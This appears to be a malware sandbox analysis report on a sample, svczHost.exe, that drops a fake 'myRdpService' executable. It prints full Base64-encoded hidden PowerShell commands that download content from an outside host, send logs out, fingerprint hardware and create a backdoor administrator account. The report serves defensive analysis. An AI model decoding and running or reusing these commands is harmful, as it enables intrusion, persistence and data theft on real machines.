gBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline"			Jump to behavior

Source: svczHost.exe.8.dr	Static PE information: section name: .managed
Source: svczHost.exe.8.dr	Static PE information: section name: hydrated
Source: myRdpService.exe.12.dr	Static PE information: section name: .managed
Source: myRdpService.exe.12.dr	Static PE information: section name: hydrated

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB993450A2 push eax; retf	0_2_00007FFB993450B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB993450B2 push eax; retf	0_2_00007FFB993450B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB9934E94D push ebx; retn 0009h	0_2_00007FFB9934E99A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFB9921D2A5 pushad ; iretd	4_2_00007FFB9921D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFB99331FD2 push eax; iretd	4_2_00007FFB99332009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFB9920D2A5 pushad ; iretd	8_2_00007FFB9920D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFB99328143 push ebx; ret	8_2_00007FFB9932814A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFB99327549 push ebx; iretd	8_2_00007FFB9932754A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFB99317918 push ebx; retf	20_2_00007FFB9931794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFB99317930 push ebx; retf	20_2_00007FFB9931794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 42_2_00007FFB993437B8 pushad ; ret	42_2_00007FFB993437C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 42_2_00007FFB99343841 pushad ; retf	42_2_00007FFB99343859
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 46_2_00007FFB99342320 pushad ; iretd	46_2_00007FFB9934232D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe	Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe			Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe			Jump to dropped file

Source: C:\Windows\Temp\myRdpService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc query myRdpService

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49764

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
